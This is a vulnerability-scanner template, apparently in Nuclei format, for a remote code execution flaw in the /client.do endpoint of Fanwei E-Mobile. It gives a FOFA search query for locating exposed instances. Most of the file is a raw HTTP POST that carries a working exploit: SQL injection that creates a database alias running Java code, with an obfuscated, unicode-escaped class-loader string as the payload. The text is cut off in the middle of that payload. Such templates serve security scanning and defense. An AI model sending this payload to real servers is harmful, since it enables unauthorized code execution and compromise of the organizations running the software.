id: fanwei-e-mobile-clientdo-rce

info:
  name: Fanwei E-Mobile client.do RCE
  author: zp857
  severity: high
  reference: https://moresec.yuque.com/iixlqz/wnv3e6/qqm4xd
  tags: fanwei-e-mobile,rce
  metadata:
    fofa-query: 'body="E-mobile" || body="e-mobile" || body="E-Mobile"'

requests:
  - raw:
      - |
        POST /client.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        WWW-Authenticate: p1WYvh2d

        %27%3bCREATE+ALIAS+ojwqdpmshr+AS+%24%24+void+f%28String+cmd%29+throws+java.lang.Exception+%7bjava.lang.Class+clz%3djava.lang.Class.forName%28%22%5cu0024%5cu0024%5cu0042%5cu0043%5cu0045%5cu004c%5cu0024%5cu0024%5cu0024%5cu006c%5cu0024%5cu0038%5cu0062%5cu0024%5cu0049%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0041%5cu0024%5cu0061%5cu0064%5cu0057%5cu0024%5cu0037%5cu0062%5cu0078%5cu0024%5cu0055%5cu0024%5cu0064%5cu0035%5cu0024%5cu0056%5cu0024%5cu0066%5cu0066%5cu0024%5cu0064%5cu0064%5cu0064%5cu0077%5cu0067%5cu0032%5cu0024%5cu0039%5cu0039%5cu0024%5cu0038%5cu0035%5cu0064%5cu0042%5cu0024%5cu0043%5cu0024%5cu0038%5cu0033%5cu0024%5cu0050%5cu0024%5cu0039%5cu0036%5cu0024%5cu0041%5cu0071%5cu0024%5cu0042%5cu0077%5cu0024%5cu0058%5cu0024%5cu0064%5cu0030%5cu0024%5cu0061%5cu0032%5cu004e%5cu0024%5cu0038%5cu0038%5cu0024%5cu0039%5cu0032%5cu0024%5cu0063%5cu0034%5cu0024%5cu0036%5cu0030%5cu0024%5cu0043%5cu0024%5cu006e%5cu0068%5cu0036%5cu0024%5cu0059%5cu0024%5cu0044%5cu0024%5cu0043%5cu0024%5cu0024%5cu0024%5cu0062%5cu0033%5cu0024%5cu0039%5cu0033%5cu0064%5cu0061%5cu0077%5cu0066%5cu0024%5cu0039%5cu0064%5cu0024%5cu0039%5cu0064%5cu0024%5cu0072%5cu0050%5cu006b%5cu0024%5cu0064%5cu0035%5cu0024%5cu0039%5cu0036%5cu0024%5cu0062%5cu0065%5cu005f%5cu0056%5cu0024%5cu0035%5cu0062%5cu0024%5cu0077%5cu0024%5cu0062%5cu0036%5cu0024%5cu0062%5cu0035%5cu006a%5cu0024%5cu0061%5cu0035%5cu0069%5cu0024%5cu0065%5cu0064%5cu0043%5cu006d%5cu0024%5cu0065%5cu0062%5cu0024%5cu0073%5cu0024%5cu0072%5cu0024%5cu0038%5cu0032%5cu0024%5cu0062%5cu0036%5cu0024%5cu0061%5cu0035%5cu0068%5cu0024%5cu0061%5cu0039%5cu0024%5cu0037%5cu0064%5cu0024%5cu0064%5cu0031%5cu0024%5cu0061%5cu0061%5cu0024%5cu0061%5cu0064%5cu0024%5cu0063%5cu0035%5cu0024%5cu0064%5cu0061%5cu0062%5cu0024%5cu0064%5cu0066%5cu004f%5cu0024%5cu0066%5cu0062%5cu0024%5cu0066%5cu0038%5cu0024%5cu0061%5cu0033%5cu005f%5cu0024%5cu0062%5cu0066%5cu0024%5cu0037%5cu0065%5cu0024%5cu0061%5cu0034%5cu0024%5cu0065%5cu0037%5cu0024%5cu0063%5cu0065%5cu0066%5cu0024%5cu0039%5cu0033%5cu0024%5cu0079%5cu0024%5cu0064%5cu0039%5cu0024%5cu004b%5cu0024%5cu0037%5cu0066%5cu0034%5cu005f%5cu0072%5cu0067%5cu0024%5cu0065%5cu0065%5cu0039%5cu0024%5cu0065%5cu0037%5cu0024%5cu0066%5cu0065%5cu0024%5cu0063%5cu0065%5cu0024%5cu0066%5cu0062%5cu0024%5cu0064%5cu0063%5cu0024%5cu0063%5cu0039%5cu0024%5cu0038%5cu0039%5cu0033%5cu0024%5cu0038%5cu0037%5cu0024%5cu0038%5cu0066%5cu0024%5cu0043%5cu0058%5cu0024%5cu0038%5cu0035%5cu0024%5cu0037%5cu0066%5cu0048%5cu0024%5cu0038%5cu0038%5cu0024%5cu0061%5cu0030%5cu005f%5cu0024%5cu0063%5cu0034%5cu0024%5cu0038%5cu0030%5cu0024%5cu0038%5cu0038%5cu0041%5cu0024%5cu004a%5cu0024%5cu004a%5cu0024%5cu0065%5cu0063%5cu0024%5cu0039%5cu0032%5cu0024%5cu006d%5cu0062%5cu0024%5cu0062%5cu0037%5cu0024%5cu0038%5cu0038%5cu0024%5cu0071%5cu0024%5cu0037%5cu0066%5cu0024%5cu0061%5cu0036%5cu0024%5cu0045%5cu0024%5cu0039%5cu0038%5cu0024%5cu006f%5cu0024%5cu0079%5cu0024%5cu0052%5cu0069%5cu0024%5cu0052%5cu0024%5cu0062%5cu0037%5cu0024%5cu0038%5cu0061%5cu0024%5cu0062%5cu0030%5cu0024%5cu0072%5cu0064%5cu0024%5cu0065%5cu0030%5cu0024%5cu0066%5cu0030%5cu0024%5cu0072%5cu0024%5cu0078%5cu0061%5cu0024%5cu0050%5cu0024%5cu0038%5cu0036%5cu0024%5cu0045%5cu0024%5cu0065%5cu0063%5cu0024%5cu0039%5cu0035%5cu0050%5cu0024%5cu0038%5cu0035%5cu0024%5cu0037%5cu0064%5cu0024%5cu0043%5cu0024%5cu0064%5cu0065%5cu0024%5cu0079%5cu0041%5cu0024%5cu0063%5cu0031%5cu006d%5cu0024%5cu0037%5cu0063%5cu0079%5cu0024%5cu0038%5cu0062%5cu0024%5cu0038%5cu0030%5cu0024%5cu0064%5cu0062%5cu0024%5cu0072%5cu0024%5cu0064%5cu0034%5cu0024%5cu0061%5cu0032%5cu0024%5cu0039%5cu0066%5cu0024%5cu005f%5cu006f%5cu0024%5cu0065%5cu0035%5cu0024%5cu0063%5cu0062%5cu0024%5cu006a%5cu0024%5cu0069%5cu0024%5cu0065%5cu0039%5cu004e%5cu0024%5cu0052%5cu0077%5cu0024%5cu0066%5cu0031%5cu0024%5cu0038%5cu0033%5cu006f%5cu0024%5cu0054%5cu0024%5cu0066%5cu0030%5cu0076%5cu0024%5cu004a%5cu0024%5cu0058%5cu0063%5cu0024%5cu0062%5cu0066%5cu0024%5cu0038%5cu0030%5cu0077%5cu0024%5cu0038%5cu0038%5cu0078%5cu0024%5cu0061%5cu0037%5cu0024%5cu0038%5cu0034%5cu0024%5cu0051%5cu0024%5cu0064%5cu0065%5cu0024%5cu0072%5cu0024%5cu0065%5cu0031%5cu0024%5cu0064%5cu0064%5cu0078%5cu0024%5cu0050%5cu005f%5cu0024%5cu0064%5cu0065%5cu0024%5cu0078%5cu0024%5cu0065%5cu0032%5cu0024%5cu0037%5cu0064%5cu0024%5cu0039%5cu0063%5cu0024%5cu0066%5cu0032%5cu0024%5cu0037%5cu0065%5cu0024%5cu0052%5cu0024%5cu006c%5cu0024%5cu0051%5cu0024%5cu0066%5cu0030%5cu0041%5cu0024%5cu0052%5cu0024%5cu006c%5cu0024%5cu0053%5cu0071%5cu0037%5cu0024%5cu0062%5cu0037%5cu0024%5cu0065%5cu0066%5cu0024%5cu006